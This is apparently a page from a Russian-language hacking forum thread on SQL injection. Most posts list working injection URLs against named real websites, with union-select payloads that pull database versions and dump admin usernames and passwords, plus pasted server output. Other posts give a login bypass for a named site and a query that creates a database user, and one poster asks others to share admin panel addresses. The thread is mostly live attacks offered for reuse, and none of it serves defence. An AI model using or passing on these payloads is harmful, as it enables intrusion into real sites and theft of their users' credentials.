SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    202
    Likes Received:
    277
    Reputations:
    32
    http://www.wavemovies.com/product.php?ID=-259+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x636174616c6f67+--
    Pr: 3
     
    2 people like this.
  2. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://www.vitek.ru/compare.php?all=-46%20union%20select%201,2,version(),4+--+
    TIC 450 PR5
     
    #13622 Фараон, 10 Mar 2011
    Last edited: 10 Mar 2011
    1 person likes this.
  3. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    http://windblowers.com/product.php?id=-73+union+select+1,2,3,4,group_concat(concat_ws(0x3a,ID,Username,Password,FName,LName,LastUpdate,AccessLevel)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+WBtblUser--+
    Pr: 4
     
    2 people like this.
  4. KoF31n

    KoF31n New Member

    Joined:
    29 Nov 2010
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    http://www.mtucizone.ru/list/index.htm?action=student&id=2286+and+1=0+union+select+1,2,group_c oncat(user(),0x3a,version(),database()),4,5,6,7,8,9,1 0,11,12,13--
    Version-5.0.90
    User-mtucizone@localhost
    Database-mtucizone
     
  5. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    Blind one on a dating site

    http://www.findme4love.net/Gallery.Search.html?Lady=5080+and%20substring%28version%28%29,1,1%29=5&Submit=FindMe
     
    1 person likes this.
  6. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.pchardware.ro/Reviews/review.php?id=-160+union+select+version%28%29--

    Code:
    http://www.worstpreviews.com/review.php?id=-115+union+select+group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.columns+where+table_schema=%27alexgi_worstreview%27+and+table_name=%27user_reviews%27
    Code:
    http://www.digital-storytime.com/review.php?id=70+order+by+57
    version :5.1.54
     
    #13626 bloodAngel, 10 Mar 2011
    Last edited: 10 Mar 2011
    1 person likes this.
  7. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.theanswerline.com/SubCategoryList.php?catid=-149+union+select+1,2,3,4,5,6,7,8,9,10,11--
    
     
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Braun

    http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6--


    5.1.53-log fleyg@localhost braun-bl portbld-freebsd8.1

    http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x3a,c_login,c_passwd,c_email,c_company,c_fio,c_phone),4,5,6%20from%20ricsom_clients%20limit%201%20offset%201--
     
    1 person likes this.
  9. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    www.patagonianexpeditionrace.com PR-5

    Code:
    http://www.patagonianexpeditionrace.com/en/news_detail.php?news=-38+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13+--+
    Code:
    5.0.91-log:[email protected]:sitio
    wisdencricketer.com PR-6

    Code:
    http://wisdencricketer.com/item.php?parent_id=3&child_id=0&item_id=-419+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18+--+
    Code:
    5.0.77-log:ansonrobson.new@localhost:wisden
     
  10. Compton

    Compton Member

    Code:
    http://www.minormania.com/feature.php?catid=757&id=-2132+union+select+1,2,3,4,5,6,7,8,9,10--
    
     
  11. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    citymagazine.rs
    PR 5
    Code:
    http://www.citymagazine.rs/page.php?cat=4 union select info() --

    4online.ru
    Rank 2
    Code:
    http://www.4online.ru/tv/?channel=-104 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7 --

    ilikeamericanmusic.com
    PR 3
    Code:
    http://www.ilikeamericanmusic.com/riff.php?EntryID=-1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()) --

    aldwick.net
    PR 2
    Code:
    http://aldwick.net/directory.php?id=-3 UNION SELECT 1,group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
     
  12. Fild3y

    Fild3y New Member

    Joined:
    13 Feb 2011
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://passionfitnesswear.com/ShoppingOnlineViewProduct.php?id_set=-1+union+select+1,group_concat(User,0x3b,Pass),3,4,5,6,7,8,9,10+from+login
     
  13. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.displaysbyrioux.com/product.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x207c7c20,version(),user(),database()),6--

    http://www.schulmerichbells.com/category.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x3a3a3a,version(),user(),database()),6,7,8,9,10,11,12--

    http://www.southworth.com/page.php?id=9999999+union+select+concat_ws(0x3c666f6e7420636f6c6f723d27726564273e202d7c7c2d20,version(),user(),database())--
     
    #13633 asql, 12 Mar 2011
    Last edited: 12 Mar 2011
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.carriertransicoldeurope.com/ml/service/service.php?sites=32+and+1=(select+version()::int+from+pg_user)

    http://www.jr-takashimaya.com/pc/pinf110h.php?id=&pass=&Category_ID=8&flg=o&daikb=1;create+user+Pun!sh3r;

    http://www.kkt-sumai.jp/main/?category=8+and+1=(select+version()::int+from+pg_user)
     
  15. Konqi

    Konqi Green member

    Code:
    http://platerfinancial.com/planning/
    authentication bypass (MySQL)

    username : ' or 1=1--+
    password : ' or 1=1--+
     
  16. Compton

    Compton Member

    Code:
    http://www.powermate.com/air_compressors/products.php?cat_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8--
    
    Version: 5.1.53-log
     
  17. asql

    asql New Member

    http://www.hotta.ru/model.php?id=-881+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,version(),user(),database()),7,8,9,10,11,12,13,14--

    v.4
     
  18. Compton

    Compton Member

    Code:
    http://www.hotelvictoriatrieste.com/hotel-Profile.html?id=-51+union+select+1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14,15+from+wnbo_users--
    
    5.x branch
     
  19. asql

    asql New Member

    http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat_ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--

    If anyone gets into the admin panel, please post the address (of the admin panel)

    http://www.bbkingblues.com/bio.php?id=-10+union+select+1,2,concat_ws(0x3a3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--

    48! Heh. Who's got more?
     
    #13639 asql, 13 Mar 2011
    Last edited: 13 Mar 2011
  20. Fild3y

    Fild3y New Member

    Code:
    http://idm.com.np/newsdetail.php?id=-1+union+select+1,group_concat(username,0x3b,password),3,4,5,6+from+mytbladminlogin
    Code:
    http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3b,password),10,11+from+tbladmin
     